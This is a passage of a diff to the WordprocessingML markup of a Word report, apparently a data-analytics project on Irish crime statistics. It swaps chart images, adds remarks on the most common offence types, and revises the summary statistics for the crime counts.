+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="842790805" name="Picture 1" descr="A screenshot of a phone&#10;&#10;Description automatically generated"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId16"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2635781" cy="1133742"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4814" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Less Incidents:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="496F2C0D" wp14:editId="592397DA">
+                  <wp:extent cx="2468068" cy="1120441"/>
+                  <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
+                  <wp:docPr id="1839552124" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1839552124" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId17"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2477503" cy="1124724"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Also, we can have an overview of the Type of Offences</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -8468,10 +8730,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00735976" wp14:editId="2E7EDF18">
-            <wp:extent cx="3211539" cy="2244213"/>
-            <wp:effectExtent l="0" t="0" r="8255" b="3810"/>
-            <wp:docPr id="1929166547" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36BFDFC1" wp14:editId="5CFC69E5">
+            <wp:extent cx="5206426" cy="1957137"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="833510218" name="Picture 1" descr="A graph with text and numbers&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -8479,11 +8741,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1929166547" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="833510218" name="Picture 1" descr="A graph with text and numbers&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8491,7 +8753,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3222353" cy="2251770"/>
+                      <a:ext cx="5241023" cy="1970142"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -8513,10 +8775,9 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="pt-BR" w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc59959350"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8524,45 +8785,11 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="pt-BR" w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:t>Insight</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -8571,7 +8798,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>s</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8581,17 +8809,95 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.0 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">From this plot, we can observe that </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="3" w:name="_Toc59959350"/>
+      <w:r>
+        <w:t>the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> most prevalent offenses in Ireland</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">are theft and related offenses, public order and other social code offenses, and damage to property and the environment. Conversely, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>kidnapping</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and related offenses are the least common type of offense.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
         <w:t xml:space="preserve">Statistics for Data Analytics </w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
@@ -8603,11 +8909,9 @@
       <w:r>
         <w:t xml:space="preserve">We can use a set of tools and techniques for collecting, organizing, summarizing, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>analyzing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>analysing</w:t>
+      </w:r>
       <w:r>
         <w:t>, and interpreting data.</w:t>
       </w:r>
@@ -8648,6 +8952,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Statistical techniques were employed in this project within the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -9127,20 +9432,19 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40E1CC9B" wp14:editId="265FFD27">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40E1CC9B" wp14:editId="54610D7C">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
-                  <wp:posOffset>2125980</wp:posOffset>
+                  <wp:posOffset>2018665</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>26670</wp:posOffset>
+                  <wp:posOffset>24765</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="4141470" cy="1541780"/>
-                <wp:effectExtent l="0" t="0" r="11430" b="20320"/>
+                <wp:extent cx="4249420" cy="1884680"/>
+                <wp:effectExtent l="0" t="0" r="17780" b="20320"/>
                 <wp:wrapSquare wrapText="bothSides"/>
                 <wp:docPr id="217" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
@@ -9155,7 +9459,7 @@
                       <wps:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="4141470" cy="1541780"/>
+                          <a:ext cx="4249420" cy="1884680"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -9176,137 +9480,143 @@
                         <w:txbxContent>
                           <w:p>
                             <w:pPr>
-                              <w:pStyle w:val="BodyA"/>
-                              <w:spacing w:line="288" w:lineRule="auto"/>
-                              <w:jc w:val="both"/>
+                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                              <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
                               <w:rPr>
-                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
+                                <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
                             </w:pPr>
                             <w:r>
                               <w:rPr>
-                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
+                                <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
                               <w:t xml:space="preserve">From this </w:t>
                             </w:r>
                             <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
-                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
+                                <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
-                              <w:t>“.</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>describe</w:t>
+                              <w:t>“.describe</w:t>
                             </w:r>
                             <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
-                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
+                                <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
-                              <w:t>()”</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> method, we can get some insights:</w:t>
+                              <w:t>()” method, we can get some insights:</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
                             <w:pPr>
                               <w:numPr>
                                 <w:ilvl w:val="0"/>
-                                <w:numId w:val="16"/>
+                                <w:numId w:val="24"/>
                               </w:numPr>
+                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                               <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
                               <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
                                 <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
                             </w:pPr>
                             <w:r>
                               <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
                                 <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
-                              <w:t>There is a wide range of 'VALUE' in the dataset, with values ranging from 0 to 20,707.</w:t>
+                              <w:t>The average number of crimes in the dataset is 34.78.</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
                             <w:pPr>
                               <w:numPr>
                                 <w:ilvl w:val="0"/>
-                                <w:numId w:val="16"/>
+                                <w:numId w:val="24"/>
                               </w:numPr>
+                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                               <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
                               <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
                                 <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
                             </w:pPr>
                             <w:r>
                               <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
                                 <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
-                              <w:t>The high standard deviation suggests that there is a significant dispersion of values</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                                <w:lang w:eastAsia="en-IE"/>
-                              </w:rPr>
-                              <w:t>.</w:t>
+                              <w:t>The standard deviation is 143.66, which means that the number of crimes varies widely.</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
                             <w:pPr>
                               <w:numPr>
                                 <w:ilvl w:val="0"/>
-                                <w:numId w:val="16"/>
+                                <w:numId w:val="24"/>
                               </w:numPr>
+                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                               <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
                               <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
                                 <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
                             </w:pPr>
                             <w:r>
                               <w:rPr>
-                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
                                 <w:lang w:eastAsia="en-IE"/>
                               </w:rPr>
-                              <w:t>The median value of 109 indicates the central tendency, but the mean is higher at 1,560.19, suggesting potential skewness in the data.</w:t>
+                              <w:t>There are a few outliers in the dataset, with the maximum number of crimes being 6523.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:numPr>
+                                <w:ilvl w:val="0"/>
+                                <w:numId w:val="24"/>
+                              </w:numPr>
+                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                                <w:sz w:val="21"/>
+                                <w:szCs w:val="21"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                              <w:t>The median number of crimes is 4, which means that half of the crimes in the dataset are less than or equal to 4, and half are greater than or equal to 4.</w:t>
                             </w:r>
                           </w:p>
                           <w:p/>
@@ -9329,142 +9639,148 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="40E1CC9B" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:167.4pt;margin-top:2.1pt;width:326.1pt;height:121.4pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="40E1CC9B" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:158.95pt;margin-top:1.95pt;width:334.6pt;height:148.4pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="BodyA"/>
-                        <w:spacing w:line="288" w:lineRule="auto"/>
-                        <w:jc w:val="both"/>
+                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
                         <w:rPr>
-                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
+                          <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
                       </w:pPr>
                       <w:r>
                         <w:rPr>
-                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
+                          <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
                         <w:t xml:space="preserve">From this </w:t>
                       </w:r>
                       <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
-                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
+                          <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
-                        <w:t>“.</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>describe</w:t>
